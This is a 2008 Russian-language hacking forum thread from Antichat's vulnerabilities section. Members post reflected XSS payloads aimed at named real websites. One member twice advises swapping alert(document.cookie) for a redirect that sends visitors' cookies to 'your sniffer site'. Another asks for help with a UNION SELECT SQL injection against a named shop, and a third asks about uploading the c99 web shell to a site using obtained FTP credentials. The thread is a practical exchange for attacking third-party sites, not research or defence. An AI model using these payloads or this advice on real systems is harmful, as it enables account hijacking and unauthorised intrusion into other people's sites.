ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3931  
Старый 29.11.2008, 22:45
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

http://www.club-nissan.ru/cars/models/Nissan_Stagea/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

не работает по ЭТОЙ ссылке xss

http://www.blogus.ru/tagposts.aspx?id=%D0%B7%D0%B0%D0%B2%D0%BE%D0%B4">< script>alert(document.cookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

тут всместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;

тут

http://userinfo.ru/sites/'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

тут

http://moemesto.ru/link/1094798'"></title><script>alert(1337)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss

тут

http://extremetracking.com/open;ref2?login=magwheel"><script>alert(document.c ookie)</script>'"><marquee><h1><script>alert(/)</script></h1></marquee>

нет xss
 
Ответить с цитированием

  #3932  
Старый 29.11.2008, 22:50
Аватар для qazer
qazer
Участник форума
Регистрация: 26.11.2008
Сообщений: 167
Провел на форуме:
1025333

Репутация: 112
По умолчанию

хммм. у меня в IE алерт вылезает по всем ссылкам
 
Ответить с цитированием

  #3933  
Старый 29.11.2008, 22:55
Аватар для Pashkela
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:

вместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;
 
Ответить с цитированием

  #3934  
Старый 30.11.2008, 02:28
Аватар для RekRut
RekRut
Участник форума
Регистрация: 27.02.2006
Сообщений: 261
Провел на форуме:
515774

Репутация: 71
По умолчанию

Помогите с одной проблемой пожалста,

Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/product.php on line 85

есть сайт, подобрал к нему колличество колонок, походу правильное потомучто если добавить еще одну ошибка меняется на вот такую

Fatal error: Cannot use object of type DB_Error as array in /home/shytobuy/domains/shytobuy.com/public_html/lib/site_common.php on line 123

сам запрос выглядит вот так

http://www.shytobuy.com/product.php?prod_id=1316+union+select+null,null,nu ll,null,null,null,null/*

проблема в том что сайт не дает добро ни на какое количество колонок, постоянно выводится ошибка, как с этим можно бороться и что вообще можно тут придумать...

спасибо за ответы
 
Ответить с цитированием

  #3935  
Старый 30.11.2008, 03:14
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

У меня есть достук к фтп (логин пасс) заливать надо етот шел туда c99comandshell???
 
Ответить с цитированием

  #3936  
Старый 30.11.2008, 03:26
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

залил а оно не заходит туда(((
Forbidden
You don't have permission to access /shell on this server.

вот че пишет
 
Ответить с цитированием

  #3937  
Старый 30.11.2008, 03:28
Аватар для 159932
159932
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038

Репутация: 1385


По умолчанию

права поменяй иль залей в др. папку ..
 
Ответить с цитированием

  #3938  
Старый 30.11.2008, 03:35
Аватар для zifanchuck
zifanchuck
Постоянный
Регистрация: 27.10.2008
Сообщений: 491
Провел на форуме:
4002393

Репутация: 464
Отправить сообщение для zifanchuck с помощью ICQ
По умолчанию

Та не там кажеться дело в самом сайте. Забил на него
 
Ответить с цитированием

  #3939  
Старый 30.11.2008, 08:38
Аватар для Shaitan-Devil
Shaitan-Devil
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843

Репутация: 204
По умолчанию

Выстави пасс и зайди.
 
Ответить с цитированием

  #3940  
Старый 30.11.2008, 12:08
Аватар для Octave_Parango
Octave_Parango
Познающий
Регистрация: 06.11.2008
Сообщений: 93
Провел на форуме:
349682

Репутация: 30
По умолчанию

Подскажите...
Это MD5?- 1114168c640b7642fd41f0b59fad1db4
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ